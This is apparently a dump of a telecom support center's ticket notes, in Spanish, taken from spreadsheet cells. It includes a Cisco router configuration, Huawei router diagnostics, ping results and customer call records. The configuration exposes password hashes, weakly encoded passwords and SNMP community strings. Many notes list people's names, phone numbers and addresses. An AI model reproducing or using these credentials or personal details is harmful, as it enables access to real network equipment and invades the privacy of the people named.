GIGABITETHERNET0/1         10.166.67.126   YES NVRAM  UP                    UP
LOOPBACK5                  10.212.122.44   YES NVRAM  UP                    UP
CC_BANRURAL_GT_AGENCIA_667#SHO INTE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437     61000        56     52000        53         0
* GIGABITETHERNET0/1            0         0         0         0     44000        51     57000        52         0
* LOOPBACK5                     0         0         0         0         0         0         0         0         0
CC_BANRURAL_GT_AGENCIA_667#SHO VER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667 UPTIME IS 5 DAYS, 13 HOURS, 13 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM RESTARTED AT 01:14:19 UTC SAT MAY 14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2485JG
2 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
250880K BYTES OF ATA SYSTEM COMPACTFLASH 0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#   PID                   SN
-------------------------------------------------
*0        CISCO1941/K9          FTX162485JG
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      NONE          NONE           NONE
DATA          NONE          NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_BANRURAL_GT_AGENCIA_667#SHO RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 3124 BYTES
!
! NO CONFIGURATION CHANGE SINCE LAST RESTART
VERSION 15.2
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_BANRURAL_GT_AGENCIA_667
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 4 EFGGPN07/DWJB.UGZOURJMJZHPAPLRUWH/NVNVXUK6.
ENABLE PASSWORD 7 09584B051E1016
!
NO AAA NEW-MODEL
!
NO IPV6 CEF
!
!
!
!
!
IP CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CRYPTO PKI TOKEN DEFAULT REMOVAL TIMEOUT 0
!
!
LICENSE UDI PID CISCO1941/K9 SN FTX162485JG
!
!
ARCHIVE
 LOG CONFIG
  HIDEKEYS
USERNAME GESTIONIP PASSWORD 7 0327570A145F
!
!
BRIDGE IRB
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.122.44 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/8901937T/_/WIMAX
 BANDWIDTH 4096
 IP ADDRESS 10.72.190.22 255.255.255.192
 RATE-LIMIT INPUT 4096000 512000 1024000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 4096000 512000 1024000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 10.136.67.17 255.255.255.248 SECONDARY
 IP ADDRESS 10.166.67.126 255.255.255.0
 DUPLEX AUTO
 SPEED AUTO
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.72.190.1
!
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
!
!
SNMP-SERVER COMMUNITY MON002804D RO
SNMP-SERVER COMMUNITY MON000089D RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION ALCALDIA MUNICIPAL DE GUINEALES SALIDA A PANQUINEY, SANTA CATARINA IXHUATAN SOLOLA
SNMP-SERVER ENABLE TRAPS ENTITY-SENSOR THRESHOLD
!
CONTROL-PLANE
!
BRIDGE 1 PROTOCOL IEEE
BRIDGE 1 ROUTE IP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OUTPUT ALL
LINE AUX 0
LINE 2
 NO ACTIVATION-CHARACTER
 NO EXEC
 TRANSPORT PREFERRED NONE
 TRANSPORT INPUT ALL
 TRANSPORT OUTPUT PAD TELNET RLOGIN LAPB-TA MOP UDPTN V120 SSH
 STOPBITS 1
LINE VTY 0 4
 LOGIN LOCAL
 TRANSPORT INPUT ALL
 TRANSPORT OUTPUT ALL
!
SCHEDULER MAX-TASK-TIME 5000
SCHEDULER ALLOCATE 20000 1000
NTP SERVER 10.72.97.1
!
END
CC_BANRURAL_GT_AGENCIA_667#</t>
  </si>
  <si>
    <t>F4564663</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS MERCADO AL 8810-7560 INDICA QUE EN EL SITIO SI CUENTAN CON ENERGIA SOLICITA VISITA PARA LAS 12:OO  **
GESTION DE PERMISOS: SOLO IDENTIFICADOS
DIRECCION: PALI LAS  MERCEDES 200 MTS AL LAGO
ATENDERA EN SITIO: CARLOS MERCADO
ID 2001623748
**</t>
  </si>
  <si>
    <t>F4564664</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALEX GARCIA AL 57738881 INDICA QUE ESTA EN HORA DE ALMUERZO QUE NO ESTA EN OFICINA SOLICITA QUE SE LE LLAME EN 15 MIN. NUEVAMENTE **
ID 2001711726
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEX GARCIA 57738881 MENCIONA QUE VALIDARA CON PR POR LO QUE SOLICITA LLAMADA EN 30 MIN
-ID 2001602857</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEX GARCIA 57738881 MENCIONA QUE SI CUENTA CON ENERGIA ELECTRICA Y QUE YA APLICARON REINICIO PERO INCONVENIENTE PERSISTE
-ID 2001616002
NOMBRE DEL CLIENTE: MINISTERIO PUBLICO
UBICACIÓN:2 AVENIDA 4-10 ZONA 1 CANTON IXPAZ SAN SEBASTIAN, RETALHULEU
CONTACTO EN SITIO: 47444248 - ALDO PEREZ
HORARIO DE ATENCION:8:00 - 15:00 HRS
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON ALEX GARCÍA/CLIENTE 57738881 INDICA ENLACE OK DESDE LAS 14:15 HORAS; SE LLAMÓ A CENTRAL 42617499 PARA VALIDAR LO DICHO POR PR Y ASÍ PROCEDER AL CIERRE DEL TICKET, NO CONTESTA.</t>
  </si>
  <si>
    <t>F4564665</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GUILLERMO LOPEZ AL 49283925 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
ID 2001628194
**</t>
  </si>
  <si>
    <t>F4564668</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DANIEL GARCIA 45836146 MENCIONA QUE VALIDARA EL FUNCIONAMIENTO CON PR POR LO QUE SOLICTA LLAMADA EN 5 MIN
-ID 2001823571</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENE DANIEL GARCIA 45836146 CLIENTE SOLICITA QUE SE LE LLAME EN 5 MIN NUEVAMENTE**
ID 2001629963
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 45506854 - YOSAHARA RESPONDE SEÑOR (NO BRINDA NOMBRE) INDICANDO NUMERO EQUIVOCADO
-ID 2001643979</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE E DANIEL GARCIA 45836146 MENCIONA QUE YA RESTABLECIO EL SERVICIO PERO ESTAN PRESENTANDO LENTITUD POR LO QUE BRINDA CONTACTO DE PR  45506854 - YOSAHARA
-ID 2001642550</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DANIEL GARCIA 45836146 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001826445</t>
  </si>
  <si>
    <t>F4564671</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE AMABILIA CASTILLO 54981769 PARA VALIDAR, CLIENTE CONFIRMA LLAMADAS ENTRANTES Y SALIENTES, SE PROCEDE CON EL CIERRE DE CASO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE AMABILIA CASTILLO 54981769
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4564674</t>
  </si>
  <si>
    <t>SE LLAMA AL 8126 CON EL GESTOR EVELIN.MEJIA PARA EL SEGUIMIENTO ID2001973050 ATIENDE WAGNER Y SE LE BRINDA LA INFORMACIÓN Y COMENTA QUE LO VALIDARA CON EL GESTOR A CARGO Y SOLICITA TIEMPO EN LINEA Y COMENTA QUE NO PUEDE ATENDER Y LO REASIGNARA Y SE MUEVE EL TICKET A TRABAJO EN CURSO.</t>
  </si>
  <si>
    <t>F4564681</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HENRRY GARCIA 57839912 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001629331</t>
  </si>
  <si>
    <t>F4564684</t>
  </si>
  <si>
    <t>**SE LLAMA A CARLOS PORTILLO 22047600  INDICA QUE EN EL SITIO HUBO UN ACCIDENTE HAY UN POSTE CAIDO SOLICITA VISITA TECNICA SE LE SOLICITAN LOS DATOS PARA LA VISITA
HORARIO DE ATENCION: 8:00 AM A  13:00 PM Y DE 13:40 A 16:00 HRS
GESTION DE PERMISOS: SOLO IDENTIFICADOS Y ENVIAR EL LISTADO DEL PERSONAL TECNICO QUE SE HARA PRESNENTA AL CORREO CARLOS.PORTILLO@UTE.GOB.SV
DIRECCION: RESIDENICAL LOS GIRASOLES 15A. AVENIDA SUR # 1 CASA 1 SAN MIGUEL.
ATENDERA EN SITIO: CECLIA DE ROMEO
ID 2001632731
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CARLOS PORTILLO 22047600  INDICA QUE EN EL SITIO HUBO UN ACCIDENTE HAY UN POSTE CAIDO SOLICITA VISITA TECNICA SE LE SOLICITAN LOS DATOS PARA LA VISITA
HORARIO DE ATENCION: 8:00 AM A  13:00 PM Y DE 13:40 A 16:00 HRS
GESTION DE PERMISOS: SOLO IDENTIFICADOS Y ENVIAR EL LISTADO DEL PERSONAL TECNICO QUE SE HARA PRESNENTA AL CORREO CARLOS.PORTILLO@UTE.GOB.SV
DIRECCION: RESIDENICAL LOS GIRASOLES 15A. AVENIDA SUR # 1 CASA 1 CIUDAD JARDIN SAN MIGUEL.
ATENDERA EN SITIO: CECLIA DE ROMEO AL 78508465 O  LIZETH DIAZ AL 78414992
ID 2001637435
**</t>
  </si>
  <si>
    <t>F4564685</t>
  </si>
  <si>
    <t>SE LLAMAA CLIENTE RUDY DE LEON-53197930 || NO CONTESTA, ENVIA A BUZON ||
2001692409
COLA:
NOMBRE: A: 53197930
NÚMERO: 53197930
DURACIÓN: 0:00:11
ESTADO: MARCANDO
DETALLES: 53197930
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 16/05/2022 13:11:22
2001692590
COLA:
NOMBRE: A: 55280199
NÚMERO: 55280199
DURACIÓN: 0:00:02
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 16/05/2022 13:11:50</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RUDY DE LEON-53197930
2001606949
COLA:
NOMBRE: A: 53197930
NÚMERO: 53197930
DURACIÓN: 0:00:25
ESTADO: MARCANDO
DETALLES: 53197930
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 16/05/2022 09:23:07</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE RUDY DE LEON-53197930  - SE REALIZAN PRUEBAS Y SIGUE SIN OBSERVARSE LA PBX CONECTADA- CLIENTE INSISTE EN QEU ES PROBLEMA DE CLARO, SE LE INDICA QUE NO VEMOS LA PBX- POR LO QUE CLIENTE BUSCARA LAS CREDENCIALES DEL SERVICIO PARA CERTIFICARLO- PIDE LLAMADA A LAS 11 AM PARA CONFIRMAR CREDENCIALES PARA REALIZAR VISITA TECNICA-
RESULTADO: LLAMADA HECHA
NOMBRE: 53197930
NÚMERO: 53197930
INICIO: HOY, 09:22
FIN: HOY, 09:40
DURACIÓN: 17:50
ID DE LLAMADA: 2001606949</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANDREA YOC AL 35940256 NO RESPONDE,  SE INTENTARA LUEGO **
ID 2001688825
**</t>
  </si>
  <si>
    <t>RUDY DE LEON-53197930  COMENTA QUE YA SOLUCIONO EL INCONVENIENTE----- FUE A NIVEL INTERNO--
2001692700
COLA:
NOMBRE: A: 53197930
NÚMERO: 53197930
DURACIÓN: 0:01:53
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 53197930
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 16/05/2022 13:14:12</t>
  </si>
  <si>
    <t>F4564686</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ORLANDO CUELLAR AL 76827603  CONFIRMA SERVICIO ESTABLE Y OPERATIVO  **
ID 2001706511
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ORLANDO CUELLAR AL 76827603  NO RESPONDE, SE INTENTARA LUEGO **
ID 2001657388
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ORLANDO CUELLAR AL 76827603  NO RESPONDE, SE INTENTARA LUEGO **
ID 2001639863 -
**</t>
  </si>
  <si>
    <t>F4564688</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BRIAN CANTE AL 30137948 INDICA QUE POR EL MOMENTO SERVICIO ESTA ESTABLE Y SOLICITA QUE SE LE ENVIE REPORTE POR CORREO || SE NOTIFICA A GESTOR **
ID 2001641176
**</t>
  </si>
  <si>
    <t>F4564690</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HERNALDO  87201235 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001727031</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE HERNALDO AL 8720-1235 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 20016466
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE HERNALDO AL 8720-1235 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 2001689711
**</t>
  </si>
  <si>
    <t>F4564691</t>
  </si>
  <si>
    <t>CLIENTE UBICA EQUIPO ASMI54L APAGADO, VERIFICA CONEXIONES Y EQUIPO NO ESTABA CONECTADO AL TOMACORRIENTE, LUEGO DE CONECTARLO EQUIPO YA ENCIENDE Y QUEDA CON LAS SIGUIENTES LUCES, PERO SE OBSERVA ALARMA DE LFA:
PWR:     VERDE
SYNC 1 VERDE</t>
  </si>
  <si>
    <t>CLIENTE REINICIA SU PLANTA PBX Y SERVICIO RESTABLECE, MAURICIO MAJANO REALIZA PRUEBAS Y VALIDA QUE YA TIENE LLAMADAS ENTRANTES Y SALIENTES. AUTORIZA EL CIERRE DEL CASO. ID2001646442.
ORT STATUS                                	= NORMAL
DEVICE NAME                                	= M02_SSSASVYG_E1_SAN_MIGUELITO_02
NAME                                       	= FRAME:0/SLOT:2/PORT:2
ALIAS                                      	= COMERCIALIZADORA BF INTERNACIONA
LOOPBACK STATUS                            	= NO
SIGNALING MODE                             	= CCS
CRC4 FRAME VERIFY SWITCH                   	= DISABLE
LINE CODE MODE                             	= HDB3
IMPEDANCE                                  	= 75¿
WORKING MODE FOR DIGITAL SECTION ACCESS    	= DIGITAL SECTION ACCESS
L2 MONITORING SWITCH                       	= ON</t>
  </si>
  <si>
    <t>EN LINEA CON CLIENTE MAURICIO MAJANO 79269516, NOS APOYA UBICANDO EQUIPOS</t>
  </si>
  <si>
    <t>F4564696</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN 6671-1900 INGRESA LA LLAMADA, NOS ATIENDE JUAN CARLOS QUIEN CONFIRMA SERVIIO OPERATIVO, SE PROCEDE CON EL CIERRE DE CASO
##LLAMADA  DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE  JUAN CARLOS LOPEZ 42233889
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE NOS APOYA CON REINICIAR EL EQUIPO CTC YA QUE LO TIENE A LA MANO, SIN EMBARGO EL EQUIPO AETHRA COMENTA QUE ESTA ATORNILLADO EN OTRO RACK Y QUE NO PUEDE MOVERLO NI DESCONECTARLO DEL TOMA CORRIENTE PARA REINICIARLO. CLIENTE DESPUES DE APOYAR CON REINICIAR EL CTC COMENTA QUE EL SERVICIO NO LEVANTA, NOS INDICA QUE NO ALCANZA A VISUALIZAR LAS ALARMAS QUE POSEE ENCENDIDAS.
SE LE INDICA QUE POSIBLEMENTE HAYA UN CORTE DE FO PERO QUE ES NECESARIO ENVIAR PERSONAL TECNICO A REALIZAR MEDICIONES O BIEN VALIDAR SI UNO DE LOS HILOS NO ESTA ROTO YA QUE DONDE ESTAN LOS EQUIPOS ESTA UN POCO DESORDENADO SEGUN LA DESCRIPCION INDICADA POR EL CLIENTE
CLIENTE INDICA QUE NO ES NECESARIO TRAMITAR PERMISOS SOLO QUE LLEGUEN LO MAS RAPIDO POSIBLE YA QUE LE URGE
##LLMAADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4564703</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTORIA PAZ 32351783 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001624454</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  VICTORIA PAZ 32351783 SIGUE SIN RESPONDER, SE INTENTARA LUEGO
-ID 2001639077</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  VICTORIA PAZ 32351783 ENVIA DIRECTAMENTE A BUZON, SE INTENTARA LUEGO
-ID 2001613809 - 2001613960</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  VICTORIA PAZ 32351783 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO**
-ID 2001650693
**</t>
  </si>
  <si>
    <t>F4564732</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE DAVID MATINEZ, QUIEN MENCIONA QUE SE LE ENVIEN GRAFICAS PARA DESCARTAR SATURACION, SIN EMBARGO SE PROCEDE A REALIZAR DESCARTES EN LA ULTIMA MILLA YA QUE SE OBSERVAR 0.40% DE PERDIDAS A NIVEL WAN, LO CUAL SE LE NOTIFICA AL CLIENTE.
2001628822
COLA:
NOMBRE: A: 0050433440852
NÚMERO: 0050433440852
DURACIÓN: 0:01:20
ESTADO: CONECTADA
DETALLES: 0050433440852
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 16/05/2022 10:22:38
&lt;CSPSHNPPN1D1EIM2&gt;PING -C 500 -S 1500 -B -M 30 -VPN VPN_CONDUMEX_0 187.128.39.174
  PING 187.128.39.174: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 187.128.39.174 PING STATISTICS ---
    500 PACKET(S) TRANSMITTED
    498 PACKET(S) RECEIVED
    0.40% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 2/3/29 MS</t>
  </si>
  <si>
    <t>F4564742</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  WALTER REYES  AL 45787911  CONFIRMA SERVICIO ESTABLE Y AUTORIZA CIERRE DE TICKET **
ID 2001652593
**</t>
  </si>
  <si>
    <t>F4564748</t>
  </si>
  <si>
    <t>-* SE HABLA CON CRISTINA LIMA (CLIENTE) SE LE INFORMA SOBRE EL PROCESO DE REVISION AUN EN CURSO, COMENTA QUE ES URGENTE, SOLICITA SE LE INFORME A SU CELULAR A LA BREVEDAD LOS AVANCES Y SI FUERA NECESARIA  LA VISITA -*
*</t>
  </si>
  <si>
    <t>F4564756</t>
  </si>
  <si>
    <t>CLIENTE INDICO PROBLEMAS DE ENERGIA EN SITIO REMOTO.
16:53
BUENAS TARDES, TENDRAN INFORMACIÓN DE LA SUCURSAL CC_AZTECA_GT_SUC_1039/ 265900290T
SERGIO, 17:48
PROBLEMA CON ENERGÍA ELÉCTRICA</t>
  </si>
  <si>
    <t>F4564764</t>
  </si>
  <si>
    <t>SE TIENE A CRISTIAN EN LINEA INDICA DURANTE UN MOMENTO VIO TIEMPOS ALTOS SIN EMBARGO ACTUALMENTE TODO RESPONDE OK. INDICA QUE DEJARA EN OBSERVACION Y AL TENER TIEMPOS ALTOS ESTARA REALIZANDO TRAZA--
  --- 128.222.240.216 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    1000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 3/3/11 MS
&lt;CC_MAYOREO_DE_COMPUTACION_GT_COATEPEQUE&gt;DISPLAY INT GI0/0/0
GIGABITETHERNET0/0/0 CURRENT STATE : UP
LINE PROTOCOL CURRENT STATE : UP
DESCRIPTION:LAN DEL CLIENTE
SWITCH PORT, PVID :    1, TPID : 8100(HEX), THE MAXIMUM FRAME LENGTH IS 1800
IP SENDING FRAMES' FORMAT IS PKTFMT_ETHNT_2, HARDWARE ADDRESS IS 04FE-8DA5-FED8
LAST PHYSICAL UP TIME   : 2017-06-28 21:26:33
LAST PHYSICAL DOWN TIME : 2017-06-28 21:26:25
CURRENT SYSTEM TIME: 2017-06-28 21:29:16
PORT MODE: COMMON COPPER
SPEED : 1000,  LOOPBACK: NONE
DUPLEX: FULL,  NEGOTIATION: ENABLE
MDI   : AUTO,  CLOCK   : -
LAST 300 SECONDS INPUT RATE 17416 BITS/SEC, 8 PACKETS/SEC
LAST 300 SECONDS OUTPUT RATE 11360 BITS/SEC, 7 PACKETS/SEC
INPUT PEAK RATE 10747440 BITS/SEC,RECORD TIME: 2017-06-25 13:01:31
OUTPUT PEAK RATE 10365712 BITS/SEC,RECORD TIME: 2017-06-24 21:19:51
INPUT:  5987728 PACKETS, 4642102126 BYTES
  UNICAST:            5987666,  MULTICAST:                   0
  BROADCAST:               62,  JUMBO:                       0
  DISCARD:                  0,  TOTAL ERROR:                 0
  CRC:                      0,  GIANTS:                      0
  JABBERS:                  0,  THROTTLES:                   0
  RUNTS:                    0,  SYMBOLS:                     0
  IGNOREDS:                 0,  FRAMES:                      0
OUTPUT:  5142356 PACKETS, 1938446020 BYTES
  UNICAST:            4823562,  MULTICAST:              318794
  BROADCAST:                0,  JUMBO:                       0
  DISCARD:                  0,  TOTAL ERROR:                 0
  COLLISIONS:               0,  EXCESSIVECOLLISIONS:         0
  LATE COLLISIONS:          0,  DEFERREDS:                   0
    INPUT BANDWIDTH UTILIZATION THRESHOLD : 100.00%
    OUTPUT BANDWIDTH UTILIZATION THRESHOLD: 100.00%
    INPUT BANDWIDTH UTILIZATION  : 0.01%
    OUTPUT BANDWIDTH UTILIZATION : 0.01%
&lt;CC_MAYOREO_DE_COMPUTACION_GT_COATEPEQUE&gt;</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GERSON ORELLANA 24210880 EXT 130 SOLICITA QUE SE LE DEJE EN OBSERVACION PARA LAS 15:00 HRS LLAMAR NUEVAMENTE **
ID 2001653832
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIAN MORALES 24210880 EXT 129 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001766204</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  GERSON ORELLANA 24210880 EXT 130 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001731767</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIAN MORALES 24210880 EXT 129 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001892845</t>
  </si>
  <si>
    <t>F4564771</t>
  </si>
  <si>
    <t>TABLA DE ESCALAMIENTO PLANTA EXTERNA REGION METROSUR				
	WO OPEN                        		&lt;&lt;	10:34:00
1/4	ELMER FLORES	58260888	2 HORAS	12:34:00
2/4	ALDO DIAZ	58261057	3 HORAS	13:34:00
3/4	RENE AGUSTIN	58261183	5 HORAS	15:34:00
4/4	RODOLFO MORALES	58261609	6 HORAS	16:34:00</t>
  </si>
  <si>
    <t>F4564783</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE RAFAEL MONTERROSO 42174563 ID: 2001653511
CONFIRMA SERVICIO OK, AUTIORIZA CIERRE DE TKT, SE NOTIFICA A JHONNSER.ESCOBAR VBIA SKYPE |  WIP</t>
  </si>
  <si>
    <t>F4564796</t>
  </si>
  <si>
    <t>CLIENTE NOS APOYA REALIZANDO LLAMADAS DE PRUEBA ENTRANTE Y SALIENTES, NOS CONFIRMA QUE TIENE EN AMBOS SENTIDOS
SE PROCEDE CON EL CIERRE DE CASO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE YESIKA AGUILAR 59671681  PARA REALIZAR PREUBAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4564798</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSÉ CAMPOSECO/PR 30259662 QUIEN VALIDA SERVICIO OPERATIVO Y ESTABLE || SE LE INDICA A CLIENTE QUE DEBE DE VERIFICAR EN SITIO SISTEMA DE ENERGIA RESPALDO PORQUE SE OBSERVA QUE CPE LLEVA MINUTOS ACTIVO
CLIENTE VALIDA SERVICIO
2001778247
COLA:
NOMBRE: A: 30259662
NÚMERO: 011 50230259662
DURACIÓN: 0:09:37
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: +50230259662
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 16/05/2022 17:50:57
&lt;CC_MP_GT_SUC240&gt;DIS VER
HUAWEI VERSATILE ROUTING PLATFORM SOFTWARE
VRP (R) SOFTWARE, VERSION 5.170 (AR100 V200R009C00SPC500)
COPYRIGHT (C) 2011-2018 HUAWEI TECH CO., LTD
HUAWEI AR109W ROUTER UPTIME IS 0 WEEK, 0 DAY, 0 HOUR, 23 MINUTES
MPU 0(MASTER) : UPTIME IS 0 WEEK, 0 DAY, 0 HOUR, 22 MINUTES
SDRAM MEMORY SIZE    : 512     M BYTES
FLASH 0 MEMORY SIZE  : 512     M BYTES
MPU VERSION INFORMATION :
1. PCB      VERSION  : AR129CGVW-L VER.C
2. MAB      VERSION  : 0
3. BOARD    TYPE     : AR109W
4. BOOTROM  VERSION  : 1</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE CAMPOSECO 30259662 QUIEN CONFIRMA QUE NO SE TIENE ENERGIA EN PR POR LO QUE SOLICITA VISITA PARA MAÑANA A LAS 8:00 HRS, SE LE INDICA QUE ANTES DE ENVIAR A PERSONAL SE VALIDARA NUEVAMENTE EL TEMA DE LA ENERGIA ELECTRICA
-ID 2001650612</t>
  </si>
  <si>
    <t>SE REALIZA LLAMADA CON CLIENTE  JOSE CAMPOSECO, A QUIEN SE LE CONSULTA SI CUENTA CON ENERGÍA ELECTRICA YA QUE EN EL SITIO SE TIENE CORTES  DE ENERGÍA PROGRAMADOS POR LA EMPRESA ELECTRICA, CLIENTE SE CONTACTA CON PERSONAL EN SITIO EN DONDE CONFIRMA QUE EFECTIVAMENTE NO TIENE ENERGÍA EN SITIO
2001646279
COLA:
NOMBRE: A: DIONICIO VELIZ CERON
NÚMERO: 7739
DURACIÓN: 0:04:12
ESTADO: DESCONECTADO [ÚLTIMO PARTICIPANTE DE CONFERENCIA]
DETALLES: 7739
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: DIONICIO.VELIZ
